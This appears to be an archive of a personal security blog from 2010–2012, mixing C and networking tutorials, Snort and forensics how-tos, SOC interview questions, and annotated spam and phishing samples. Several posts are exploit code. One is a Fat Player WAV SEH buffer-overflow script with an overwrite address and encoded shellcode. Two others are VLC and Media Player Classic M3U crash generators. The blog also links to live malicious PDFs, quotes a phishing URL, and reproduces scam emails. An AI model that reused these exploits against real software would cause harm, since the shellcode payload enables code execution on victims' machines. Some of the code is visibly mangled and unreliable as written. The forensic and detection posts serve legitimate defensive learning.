Security Unplugged !!!

10 must-read Books for Developers

2012-01-31T20:34:00.004+05:30

I liked the article so reposting it. Hope you will enjoy !!!

Blog site Stackoverflow posed an interesting question: "If you could go back in time and tell yourself to read a specific book at the beginning of your career as a developer, which book would it be?"

The accumulated wisdom of Stackoverflow readers posted over the past three years reads like a who's-who of the programming book industry, but several missing titles caught my eye.

Here's the Stackoverflow list:

"Code Complete" by Steve McConnell (2004)". Tackles every facet of programming, with tons of examples.

"The Pragmatic Programmer" by Andrew Hunt and David Thomas (1999). Concentrates on nitty-gritty real-world approaches to solving problems through code.

"Structure and Interpretation of Computer Programs" (2nd Edition, 1996) "by Harold Abelson, Gerald Sussman, and Julie Sussman. Concentrates on breaking big problems down into little ones, and ensuring the pieces come back to build the whole. The book is available under the Creative Commons Noncommercial License, for free on the Web.

"The C Programming Language" (2nd Edition, 1988) by Brian Kernighan and Dennis Richie. Not only offers the definitive guide to C, but shows you how to program in general. My personal choice for the most important first book.

"Introduction to Algorithms" by Thomas Cormen, Charles Leiserson, Ronald Rivest, and Clifford Stein (2009). Gives fast ways to solve complex problems, using the right data structures. Comprehensive and quintessentially useful.

"Refactoring: Improving the Design of Existing Code" by Martin Fowler, Kent Beck, John Brant, and William Opdyke (1999). Shows you how to rebend a programming pretzel, taking poorly designed code and turning it into something even humans can understand.

"Design Patterns: Elements of Reusable Object-Oriented Software" by Erich Gamma, Richard Helm, Ralph Johnson, and John Vlissides (1994). Serves as a reference of object oriented techniques. I'm surprised to see this on a list of "beginning of your career" books because it's much more suitable for people with a lot of OOP under their belts.

"The Mythical Man-Month" by Frederick Brooks (1995)". A management classic in the finest tradition. While not a programming book, a must-read for every developer.

"The Art of Computer Programming, Volume 1: Fundamental Algorithms" (3rd Edition, 1997) by Donald Knuth. For anyone with a mathematical predilection, Volumes 1 and 3 ("Sorting and Searching") stand out as true bibles of the industry. With Volumes 2 ("Seminumerical Algorithms") and 4A ("Combinatorial Algorithms, Enumeration and Backtracking") published, plans are still in place for Volume 4B ("Graph and Network Algorithms"), Volume 4C (maybe Volumes 4D and 4E, "Optimization and Recursion"), Volume 5 ("Syntactic Algorithms"), Volume 6 ("Context-Free Languages"), and Volume 7 ("Compiler Techniques").

"Compilers: Principles, Techniques and Tools" (2nd Edition, 2006) by Alfred Aho, Monica Lam, Ravi Sethi, and Jeffrey Ullman. The 1,000-page "dragon book" focuses on compilers, but in so doing covers topics every developer should understand.

What's missing? I mentioned Knuth's Volume 3, but several others pop out.

If you veer off the developer-centric track for a moment, many classics would broaden the horizons of any aspiring analyst. "Godel, Escher, Bach" by Douglas Hofstadter (1979) and "Zen and the Art of Motorcycle Maintenance" by Robert Pirsig (1974) always come up as manifestos of the developer class.

Sticking to developing, though, I'm surprised that these didn't make the top 10:

"Clean Code: A Handbook of Agile Software Craftsmanship" by Robert Martin (2008), emphasizes the importance of building code that can be digested, working through lots of real-world examples. It covers some of the same ground as Martin's earlier book, "Agile Software Development," and sets the stage for Martin's new book, "The Clean Coder."

"Code: The Hidden Language of Computer Hardware and Software" by Charles Petzold (2000) should be on the short list of everyone who's involved in the computer industry, developer or not. Petzold covers the basics -- number systems, high-level languages, comm protocols, hardware, GUIs -- and doesn't overwhelm with jargon.

For anyone destined to a corporate IT job, these three should be required reading:

"Patterns of Enterprise Application Architecture" by Martin Fowler (2002) helps corporate developers recognize common patterns in real-world problems, and digs into solution details for each pattern.

"Coders at Work" by Peter Seibel (2009) takes case histories -- which is to say, influential developers' real-life stories -- and weaves them into a powerful view of how 15 of the industry's best and brightest kicked some serious technical butt.

"Peopleware" (2nd edition. 1999)" by Tom DeMarco and Timothy Lister emphasizes the human element in software development and how to put together a project that actually gets work done.

I won't say that list is definitive, but if there's a nascent developer, developer wannabe, or burned-out developer seeking inspiration in your circle of friends, do them a favor and get them one of these books.

This story, "10 must-read books for developers" was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter.

Happy Reading ;-) !!!

SOC Interview Questions 1

2012-01-25T14:17:00.005+05:30

Below are the questions collected from friends who attended interviews related to Security Operations Center (SOC).

Difference between Probe vs Scan.
Difference between Security event and Security incident.
Wwhat is incident response (IR)?
How will you carry on Network forensics?
How will you carry on Memory forensics?
What is APT (Advanced Persistent Threat)?
What is IOC (related to APT)?
What is ROT13?
What is C2 (Command and Control)?
Difference between normal threat vs APT ?
Vulnerability vs Threat vs Exploit vs Risk.
Different Evasion techniques of Malware?
Different ways of compressing Malware?
What is threat agent?
Explain drop by downloads.
Difference between Symmetric and Asymmetric encryption?
How do you collect image for Forensics without modifying the integrity of data on the PC/Laptop?
(http://darshanams.blogspot.com/2010/09/forensics-1-extracting-image.html)
Size of Registers in CPU? Are registers same for different CPU's?
How to change Linux root password?

Will come up with more questions once I get in touch with other friends.

Endianness: Different Processors

2012-01-25T14:03:00.003+05:30

Endianness refers to the way data is represented in memory by different processors. For details about endianness you can refer
http://en.wikipedia.org/wiki/Endianness

We will run below code on two different CPU architectures, Intel and MIPS
*******Start of Code endi.c ********
#include
#include

int main()
{
        int magiclhtona, magiclntoha, magiclhton1, magiclntoh1, htonli2, htonsi2, ntohli2, ntohsi2, htonli6, htonsi6, ntohli6, ntohsi6;
        magiclhtona = htonl(0xa1b2c3d4);
        magiclntoha = ntohl(0xa1b2c3d4);

        magiclhton1 = htonl(0x1f8b0800);
        magiclntoh1 = ntohl(0x1f8b0800);

        htonli2 = htonl(25);
        htonsi2 = htons(25);
        ntohli2 = ntohl(25);
        ntohsi2 = ntohs(25);

        htonli6 = htonl(65535);
        htonsi6 = htons(65535);
        ntohli6 = ntohl(65535);
        ntohsi6 = ntohs(65535);

        printf("magiclhtona=%p magiclntoha=%p,magiclhton1=%p, magiclntoh1=%p, htonli2=%d htonsi2=%d ntohli2=%d ntohsi2=%d, htonli6=%d, htonsi6=%d, ntohli6=%d, ntohsi6=%d\n", magiclhtona, magiclntoha, magiclhton1, magiclntoh1,htonli2, htonsi2, ntohli2, ntohsi2, htonli6, htonsi6, ntohli6, ntohsi6);
}
    return 0;

*******Endof Code endi.c ********
To understand the output we should know what is he endianness of the Processors we are using
Intel        Little Endian
MIPS     Big Endian

Output on Intel processor
[praveen]# ./endi
magiclhtona=0xd4c3b2a1 magiclntoha=0xd4c3b2a1,magiclhton1=0x88b1f, magiclntoh1=0x88b1f, htonli2=419430400 htonsi2=6400 ntohli2=419430400 ntohsi2=6400, htonli6=-65536, htonsi6=65535, ntohli6=-65536, ntohsi6=65535

Output on MIPS processor
praveen# ./endi
magiclhtona=0xa1b2c3d4 magiclntoha=0xa1b2c3d4,magiclhton1=0x1f8b0800, magiclntoh1=0x1f8b0800, htonli2=25 htonsi2=25 ntohli2=25 ntohsi2=25, htonli6=65535, htonsi6=65535, ntohli6=65535, ntohsi6=65535
praveen#

Modify endi.c source file by adding below code
        int htonli8 = htonl(65538);
        int htonsi8 = htons(65538);
        int ntohli8 = ntohl(65538);
        int ntohsi8 = ntohs(65538);
       printf("htonli8=%d, htonsi8=%d, ntohli8=%d, ntohsi8=%d\n", htonli8, htonsi8, ntohli8, ntohsi8);

Output on Intel Processor
htonli8=33554688, htonsi8=512, ntohli8=33554688, ntohsi8=512

Output on MIPS Processor
htonli8=65538, htonsi8=2, ntohli8=65538, ntohsi8=2

Hope this will help someone somewhere to understand endianness on different Processors.

Building Binary from multiple C files: Using custom header, accessing variables across multiple .c files

2011-09-29T18:02:00.004+05:30

One of my friend requested me to add basic stuff related to C programming. Initially when I started coding I was skeptical using custom header files, using same variable in different .c files and building binary from multiple C files. This post probably clears all those doubts.

Below shapshot shows content in header file (praveen.h) and code in different C files (sharedvar1.c, sharedvar2.c).

Below snapshot shows how to compile multiple C files to create a single binary and also output of the program.

Also we have learned how to access single variable across multiple files.

Hope this might have helped from someone somewhere :) !!!

Malicious PDF: Portable Document Files Compresion/Encoding/Obfuscation

2011-09-08T18:13:00.016+05:30

Malicious PDF's has increased manifold which are used to infect computers with Malware of execute code when PDF files are opened. We will see various ways how javascript embedded within PDF's can be compressed or encoded to evade detection by IDS/IPS and Anti Virus. Normally many PDF Parsers crash while analyzing the malicious/malformed file but Adobe reader successfully opens the file which leads to infection.

Below is the malicious PDF file viewed in text editor.

PDF Parsers might have issues in analyzing following abnormal files:

1. Portable Document File Format does not strictly abide to its specification.

2. PDF Version might be malformed (NULL value, incomplete value etc) (can see in above pic)

3. May not contain endobj or endstream (atleast one string should be present within an object)

4. May not contain xref table

5. Names may be Encoded (/JavaScript as /J#61vaScript).

6. No %%EOF header

7. There might be multiple %%EOF headers or trailer’s indicating incremental updates.

8. PDF embedded within other PDF (same object numbers in a single file).

9. Different types of Evasions/ Encoding can be found at

http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

Different Encoding/Compressions Filter types are

/FlateDecode

/ASCIIHexDecode

/ASCII85Decode

/JBIG2Decode

/LZWDecode

/RunLengthDecode

/SCIIHexDecode,

/CCITTFaxDecode

/DCTDecode

/JPXDecode

This might not be the full list of Filters (not sure) .

Below snapshot shows highly obfuscated PDF file

Good articles related to PDF's can be found at

http://blog.didierstevens.com/category/pdf/
http://www.decalage.info/file_formats_security/pdf

http://code.google.com/p/corkami/wiki/PDFTricks

For quick analysis of a PDF file you can upload to
http://wepawet.cs.ucsb.edu/

Live malicious PDF files can be found at
http://filex.jeek.org/archive_PDF.zip
Please do not open files in the archive with any of the PDF readers.

Comments are most welcome :) !!!

Message Queues- An Introduction

2011-07-23T22:33:00.008+05:30

Processes can exchange messages using Message Queues. Sending process message is saved in a queue, Receiving process reads the message from queue.

Below program sends message to queue.

Below snapshot is the code for receiving process which reads message from queue.

Compiling msg_snd.c:

#gcc msg_snd.c -o msg_snd

Compiling msg_recv.c:

#gcc msg_recv.c -o msg_recv

Output:

Snapshot below

To check the state of Message Queues run ipcs -q command.

Pointers:

1. Include headers

sys/types.h

sys/ipc.h

sys/msg.h

2. msgq_id (message id) is an arbitrary number of type int generated by msgget() which should be passed as parameter/argument to msgsnd(), msgrcv()

msgq_id can also be generated using ftok()

3. key (key_t is of type int) is another arbitrary number. Same key value must be passed as parameter/argument to msgsnd() and msgrcv().

4. Message Type (mtype) is another arbitrary number. Same mtype should be passed as parameter/argument to msgsnd(), msgrcv()

5. mtype is passed as struct mbuf argument to msgsnd(), and long type to msgrcv()

6. for man page of any API run man command e.g.

man 2 msgsnd

man ipcs

This is pretty high-level overview of Message Queues.

Feel free to drop a comment.

Snort: Logging Alerts to Syslog Server

2011-05-07T13:55:00.006+05:30

Life is so busy. It's been pretty long since my last post. Well coming to the post :) ...

We will get into configuration details of Syslog and Snort to log our alerts into Kiwi Syslog Server.

Add the following line to Snort configuration file
output alert_syslog: host=172.16.232.161:514, LOG_AUTH LOG_ALERT
Snort configuration file can be found at
/etc/snort/snort.conf

In my case Snort is running on 3.3.3.9 on eth1 and eth0 is assigned with 172.16.232.171 IP which talks with Syslog Server.

Following command is used to run Snort
snort -c /etc/snort/snort.conf -i eth1
-c provide snort configuration file path
-i interface on which Snort is sniffing the traffic

Output shown in above figure is seen when the Snort command is successful.

Modify syslog configuration file
/etc/rsyslog.conf
by adding line
*.* @172.16.232.161:514

where 172.16.232.161 is the Syslog Server IP Address and UDP/514 is the port on which it is listening.

*.* says log all types of alerts.

To make sure that Syslog Server is running on UDP/514 port uncomment below lines in the configuration file

$ModLoad imudp.so

$UDPServerRun 514

Above lines are commented by default.

Once the modified configuration is saved restart the Syslog daemon

/etc/rc.d/init.d/rsyslog restart

Make sure to stop firewall or add rule to allow traffic on UDP/514 port.

When we send malicious payload or replay PCAP with malicious traffic on the interface where snort is running, we can see alerts in our Kiwi Syslog Server which is installed on Windows XP machine (172.16.232.161).

Below is the Packet Capture format when Snort sends alerts to Syslog Server.

Refer Snort Manual and/or Snort FAQ for further details.

Hope this will help someone somewhere.
Enjoy :) !!!

Wireshark: Remote Packet Capture, bit of Security

2010-11-29T22:49:00.009+05:30

Wireshark/Ethereal is one of the best open source tools we have. I don't think there will be individuals working in Networking domain (especially into IDS/IPS, Firewalls etc.) and don't know Wireshark/tcpdump. Please I wanna see u guys/gals ;-)

There are many features available in Wireshark, we are going to focus on remote packet capture.

Need Wireshark Version 1.4.2 with the new WinPcap available inbuilt with it. Install this on bothe the machines, where you are going to take capture (client) and on the machine where we want to sniff the traffic(server). On Server we need to start "Remote Packet Capture Protocol v.0 (experimental)" service, which will open TCP Port 2002 on the Server.

Once the service is started, run wireshark on the Client machine. Goto Capture->Options. Clicking Options will pop up a window shown below.

In this window we can see Interface field on the top left corner which has drop down menu, from this menu select "Remote" option which will pop one more window asking for details like Host: (Enter IP Address), Port:, enter 2002 here.

Authentication:

For logging onto Server to take packet capture we need to successfully authenticate to server.

Under Authentication, opt for Password authentication, Null authentication is not supported which might throw below error.

Once the Authentication is successfull you can select one of the interfaces on the Server if there are multiple for sniffing.

Security:

Well, this is one of the awesome features Wireshark has given to its users. But the downside is, log in credentials traversing the network in clear text. Atleast they would have provided basic encryption/ encoding techniques to hide password.

Exposing all the interfaces of a multi homed Server, it's IP Addresses etc.

Hope this post and feature will be very helpful for you :-)

Forensics 2: Identifying File System and Extracting it

2010-10-02T20:08:00.016+05:30

The advantages of analyzing disk images are that the investigators can:
a) preserve the digital crime-scene
b) obtain the information in slack space
c) access unallocated space, free space, and used space
d) recover file fragments, hidden or deleted files and directories
e) view the partition structure and
f) get date-stamp and ownership of files and folders.

Here we will try to concentrate on extracting the File System if any from the image for analysis available from the Crime Scene.

Lets check the md5 hash of the image under analysis for integrity purposes. The md5 hash algorithm produces a 128 bit “fingerprint” of a file, also known as a message digest. To view the md5 hash value assigned to a given file, the md5sum utility can be used.Lets check the file type of the image under analysis by using file command. The file command works by testing “arguments” within a file, and will then classify the file as whichever file type the file command sees fit. We see from the output of the file command that the image file contains an x86 boot sector. The boot sector of a computer is a primary starting point for an OS. The operating system will start at the boot loader, and the machine will read the first 512 bytes of the disk, which is known as the boot sector. The first 512 Bytes (boot sector) will be loaded into memory and will then be executed. This will initiate the boot process.

The x86 boot sector type message was obtained because the magic number 0xAA55 value is located at the 0x1FE offset within the image; defined in the file “/usr/share/file/magic” which is used by file command.

Determining the File System type of the Image

Lets run mmls utility to determine the File System type of the given image extracted by using dd command as shown below.-t Specify the media management type (dos, mac, bsd etc)

We see above that the NTFS (New Technology File System) partition begins at sector 63 (to see this look at the last column in the row where it says NTFS (0x07). Now look to the left in the start column of the row NTFS and we can see the value 0000000063). So for all the Sleuth Kit commands we need to specify an offset of 63 if the file used is raw image.

MMLS is a forensics utility that query’s an image file, and prints the partition tables and disk labels. This command is very useful when attempting to determine at which sector a partition begins and ends. We see that there is a NTFS file system on this image. We use the –t dos switch to tell mmls to utilize a dos based architecture for the file system.

File system is extracted using dd.exe command. Input file is the raw image collected from the machine which is under forensic investigation. Block size used to extract File system is 512 bytes and skipped 62 sectors because our NTFS File System is starting after those sectors.

Thus extracted File System image can be mounted by using mount command, we can check the mounted File System using fdisk -l command.

After extracting the image calculate md5 of the extracted NTFS File System image for integrity purposes.

Extracting the File System from the image

-b partition sizes in bytes

-r Recurse into DOS partitions and look for other partition tables.

-v verbose

Forensics 1: Extracting an Image for Investigation

2010-09-14T02:32:00.009+05:30

Forensic investigations are usually performed on Static Data (images). Many open source (TSK) and commercial tools (Encase) are available for forensic analysis of a given image.

Lets look at how to take the image of a drive, hard disk, partition etc. Few tools which can be used are dd, windd etc.

Well, what is an image? Image is a bit-by-bit copy of the Hard Disk.

I used dd.exe command for taking the image of the computer under investigation.

dd command is found by default in Linux. On windows we can obtain the binary from The Sleuth Kit (TSK) or comes by default if Cygwin is installed.

First, lets list all the available drives (A:, B:, C: etc.,) or partitions on the machine where we want to collect image.

Below is the snapshot of the dd command used for extracting the image for investigation.

We should be very cautious while collecting the image for investigation because nothing should be changed on the machine under analysis. So most of the time we should use CD with all the tools and redirect the image to external drive or network share for saving rather than saving the image on local machine.

dd command can also be used to extract a File System from Raw image.

This is just a high level overview of Forensics will come up with more articles.

For further reading you can start from

http://en.wikipedia.org/wiki/Computer_forensics

VLC 1.0.5 M3U File Processing Stack Buffer Overflow

2010-08-10T02:17:00.001+05:30

print "VLC 1.0.5 M3U File Processing Stack Buffer Overflow"

handler = "ftp://"
buff = "D" * 134000

mal_buff = handler + buff

try:
vlcm3u = open ("vlcm3u_mem_corru.m3u","w")
vlcm3u.write(mal_buff) vlcm3u.close()
print "\nMalicious M3U File Created . . . !!"
print "[+] Coded by Praveen Darshanam"
except:
print "\nUnable to Create File\n"

Fat Player 0.6b WAV File Processing Buffer Overflow (SEH)

2010-08-10T01:58:00.001+05:30

#################################################################################################
# Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute
# arbitrary code via a long string in a .wav file. NOTE: some of these details are
# obtained from third party information.
#
# Reference:# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4962
# http://xforce.iss.net/xforce/xfdb/52713
# http://sourceforge.net/projects/fatplayer/
# http://www.exploit-db.com/exploits/9495/
## Tested on: Windows XP SP3, FatPlayer 0.6b
#
#
# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen Darshanam# Email: praveen[underscore]recker[at]sify.com
# Blog: http://darshanams.blogspot.com
# Date: 10th August, 2010
#
#
#################################################################################################

print "\nFat Player 0.6b WAV File Processing Buffer Overflow (SEH)"

buff1 = "D" * 4132
nseh = "\xeb\x06\x90\x90"
seh_ppr = "\x39\x1f\xd1\x72"
#0x72D11F39 pop edi - pop - retbis msacm32.drv

noop = "\x90" * 10
code2exec = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")

buff2 = "Z" * (40000 - len(buff1) - len(nseh) - len(seh_ppr) - len(noop) - len(code2exec))
mal_buff = buff1 + nseh + seh_ppr + noop + code2exec + buff2
try:
fatpwav = open ("fatplayerboseh.wav","w")
fatpwav.write(mal_buff)
fatpwav.close()
print "\nMalicious WAV File Created . . . !!"
print "[+] Coded by Praveen Darshanam"except: print "\nUnable to Create File\n"

Media Player Classic - Home Cinema 1.3.1333.0 M3U File Heap Overflow/DoS (0-Day)

2010-07-22T01:06:00.006+05:30

# Vulnerability Found: Praveen Darshanam
# Coded: Praveen Darshanam
# Greetz to all Andhra Hackers and ICW Members
# http://www.darshanams.blogspot.com

##########PoC Start################
print("\n*****Program need to be run on Python 3.1*****")
print ("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS (0-Day)\r\n\r\nTested on:\nWindows XP SP3\n
Media Player Classic - Home Cinema\n\t\t Build number: 1.3.1333.0\n\t\t
MPC Compiler: VS 2008\n\t\t FFmpeg Compiler: GCC 4.4.1\n""")

head = "EXTM3U"
buf = "D" * 1000

mal_buf = head + buf
#print ("mal_buf:",mal_buf)
try:
mpc_mal = open("mpc_m3u_crash.m3u",'w')
mpc_mal.write (mal_buf)
mpc_mal.close()
print ("File Created Successfully: mpc_m3u_crash.m3u\n")
except:
print ("Cannnot Create M3U File\n")

print ("[+] Found and Coded by: Praveen Darshanam\r\n")
##########PoC End################

When the M3U file is around 1000 bytes following "C++ Runtime Error Exception" is thrown .

If the buffer is increased further Media Player Classic shows below error but doesn't crash.

Playing with M3U file sizes between 950 bytes to 2000 bytes will throw above Exceptions and lead to Crashes occassionally. Crash report with C++ Exception is shown below.

--------------CRASH REPORT START----------------------
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll
ModLoad: 10000000 100fb000 C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll
ModLoad: 02530000 0257f000 C:\WINDOWS\system32\DRMClien.DLL
(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c
eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e pop esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:004> g
WARNING: Continuing a non-continuable exception
(6dc.cec): Break instruction exception - code 80000003 (first chance)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c
eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mpc_hc+0x31d14b:
0071d14b cc int 3

-----------CRASH REPORT END-------------------

Server Message Block (SMB) Protocol Dissection

2010-07-12T19:42:00.007+05:30

Primary goal of SMB is File Transfer within LAN.

SMB Header Structure:
SMB_Header
{
UCHAR Protocol[4];
UCHAR Command;
SMB_ERROR Status;
UCHAR Flags;
USHORT Flags2;
USHORT PIDHigh;
UCHAR SecurityFeatures[8];
USHORT Reserved;
USHORT TID;
USHORT PIDLow;
USHORT UID;
USHORT MID;
}

SMB Parameter Block:
SMB_Parameters
{
UCHAR WordCount;
USHORT Words[WordCount] (variable);
}

SMB Data Block:
SMB_Data
{
USHORT ByteCount;
UCHAR Bytes[ByteCount] (variable);
}

For further details
http://msdn.microsoft.com/en-us/library/ee441466%28v=PROT.13%29.aspx

Snort Preprocessors and Alerts

2010-06-28T00:38:00.008+05:30

Snort Preprocessors

Preprocessors were introduced in Snort v1.5. Preprocessor code is run before the detection engine is called, but after the packet has been decoded. The packet can be modified or analyzed in an out-of-band manner using this mechanism. Preprocessors help in identifying possible attack packets before rules are applied, after the preprocessing stage various rules are applied on the packets (raw data) for detecting attacks based on the pattern matches. Preprocessors need to be configured from snort.conf file which can be found at /etc/ or /etc/snort/. frag2 should be commented if frag3 is used and stream4 is commented if stream5 is used.

preprocessor frag2

preprocessor frag3 // IP packet reassembly or defragmentation

preprocessor stream4: detect_scans

preprocessor stream4_reassemble

preprocessor stream5 // TCP Segmentation reassembly, stateful protocol analysis

preprocessor http_decode // http normalization of url-encoded data

preprocessor rpc_decode

preprocessor bo // back orifice backdoor traffic detection

preprocessor telnet_decode

preprocessor sf_portscan // detects various portscans

preprocessor sf_ssh

preprocessor sf_smtp

preprocessor sf_ftptelnet

preprocessor sf_dns

preprocessor sf_dcerpc

preprocessor sf_ssl

Snort also has Postprocessors or output plug-ins. These are the snort processors/plug-ins that determine what to do after traffic is identified as malicious based on pre-processors or rules. Popular post-processors are those that send snort alerts and log data to databases; those which allow SNMP event messaging etc.

Snort Alerts

Snort alerts logged onto a logfile look like (there may be different alerts in your environment)

[**] [1:2050:14] SQL version overflow attempt [**]

[**] [1:8428:9] WEB-MISC SSLv2 openssl get shared ciphers overflow attempt [**]

[**] [122:3:0] (portscan) TCP Portsweep [**]

[**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**]

The first number (1, 122, 119 here) is the Generator ID, this tells the user what component of Snort generated this alert. List of GIDs can be found at etc/generators in the Snort source.

Generators file has the format shown below

generatorid || alertid || MSG

Below diagram shows the generator id, alert id or snort id and alert name.

Any alert under ARP Spoofing and spp_fnord will have a Generator ID's of 112 and 114 respectively.

The second number (2050, 8428, 3, 4 here) is the Snort ID (or Signature ID). For a list of preprocessor SIDs, please see etc/gen-msg.map. Rule-based SIDs are written directly into the rules with the “sid” option.

The third number (14, 9, 0, 1 from above alerts) is the revision ID. This number is primarily used when writing signatures, as each re-edition or fine tuning of the rule should increment this number with the “rev” option. e.g. " SQL version overflow attempt" signature is modified 14 times !!!

For detailed description of various concepts refer Snort^TMUsers Manual.

http://www.snort.org/assets/140/snort_manual_2_8_6.pdf

twitter Phishing

2010-06-11T23:10:00.009+05:30

This was a Phishing mail related to twitter in my SPAM box, out of curiosity I opened this mail to dig deeper. Sample mail cam be seen in the picture below.

When you take mouse over the URL in the mail or on to "Twitter Support" link we can see the Phishing URL.

http://84.51.21.51/~chatliam/mepw.html

Opening the link will redirect us to

http://tirearoma.com/

Didn't find anything malicious in the tirearoma.com page. The Phishing might be just to increase hits to "tirearoma.com", pay-per-click !!!

The redirected page has plethora of capsules related to Viagra etc. etc.

Happy browsing !!!

First Vulnerability I Found: CVE-2010-2091

2010-06-02T01:52:00.003+05:30

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2091

http://xforce.iss.net/xforce/xfdb/58835

http://www.securityfocus.com/archive/1/archive/1/511401/100/0/threaded

http://www.exploit-db.com/exploits/12728

SPAM Mails: Part 2

2010-05-11T19:30:00.003+05:30

Following is the SPAM mail which most of us has received and many ended up in replying to it.

Dearest One,

Good a thing to write you. I have a proposal for you; this however is not
mandatory nor will I in any manner compels you to honour against your
will.

I am Aisha Al- Salam, 23years old and the only daughter of my late
parents Mr.and Mrs.Hassan Al-salam my father was a highly reputable
business magnet - (a cocoa merchant) who operated in the capital of Cote
D Ivorie during his days.

It is sad to say that he passed away mysteriously in France during one of
his business trips abroad year 12th.Febuary 2007. Though his sudden death
was linked or rather suspected to have been masterminded by an uncle of
his who travelled with him at that time. But God knows the truth! My
mother left me when I was just 4 years old, and since then my father took
me so special.

Before his death on February 12th 2007 he called his secretary who
accompanied him to the hospital and told him that he has the sum of 7.5
million, United States Dollars.(USD$7,500.000 ) left in one of the
Leading Bank in Cote D Ivorie and he deposited the money in my name in
the bank as the next kins.

I am just 23 years old and a university undergraduate and really don't
know what to do. Now I want a foreign partner overseas where I can
transfer this fund. This is because I have suffered a lot of set backs as
a result of incessant political crisis here in Cote D Ivorie . The death
of my father actually brought sorrow to my life.

Sir, I am in a sincere desire of your humble assistance in this
regards.Your suggestions and ideas will be highly regarded. Now permit me
to ask these few questions:-

1. Can you honestly help me as your daughter?
2. Can I completely trust you?
I have decided to offer you 30% of the total amount for your willingness
to help me, Please kindly response to my mail immediately with your full
personal information, telephone number so that I can call and speak with
you on the telephone.

Please, consider this and get back to me as soon as possible.

Thank you so much.
Insallah .

My sincere regards,
Ms Aisha Al Salam.

SPAM Mails: Part 1

2010-05-11T19:08:00.004+05:30

Below is the SPAM mail which I received in my INBOX. To make it realistic spammers had gone one step ahead and provided with contact numbers and few images to make it realistic and entice users to give their personal information.

FROM THE DESK OF THE DIRECTOR:
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT

WINNING NOTIFICATION FOR CATEGORY "A" WINNER ONLY

Amount Won: £1,000,000.00 Pounds

Dear Lucky winner,

We are glad to inform you that you have won a prize money of One Million
Great Britain Pound Sterlings (£1,000,000.00) in our last lottery promotional
draw.

We are pleased to inform you of the final announcement of the result in
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT. Your email address was selected by our Electronic Random Selection System (ERSS) from an exclusive list of e-mail addresses of individual and corporate bodies. No tickets were sold.

With Ref.Number: GP 14-M-246-04,
Batch Number: 573881545-UK/2010
Ticket Number: PP3502/8707-01.

CONGRATULATIONS!!!:
To file for Your Claims Please contact.
********************************************
Name: MR JOSEPH POUNCH
Tel:+447014275315
Email: josephpounch18@gmail.com
*******************************************
However you will have to fill and submit this form to the events manager for
verification & direction on how you canclaim your winning fund.
Fill the Details Below:
1. Full name...............
2. Contact Address......
3. Age.........................
4. Mobile Number.........
5. Marital Status..........
6. Sex.........................
7. Occupation..............
8. Company................
9.State:......................
10.Country..................
11.Nationality...............
12.Address.................
13.Valid ID Proof (Send as email attachment)
Your Reference and Batch number at the top of this mail:

Mrs Vivian Jones.
Lottery Coordinator

Most of the netizens fall pray for this and end up providing their information. Above details can be used to crack passwords with intelligent guesses.

Before providing information in reply to such mails think once, "who the hell in this world is going to give free money !!! "

Premier University of Andhra Pradesh Serving Malware.

2009-10-09T22:35:00.013+05:30

Couple of days back I reported the infection to few Security Researchers through OWASP. Now Firefox and Google says the same!! If we visit http://www.nagarjunauniversity.ac.in/, Firefox browser alarms you with the following warning

Other way round to make sure whether it is service malicious pages or malware is: type "nagarjunauniversity" in google window and open the first link

Google description about the pages hosted by www.nagarjunauniversity.ac.in is

Real time view of malicious pages and Analysis
Visiting the site welcomes you with script execution, see diagram below
Viewing the source of this page will make you think for a while. Why Chinese and Russian links are present in the page?? Have a glimpse of the code.

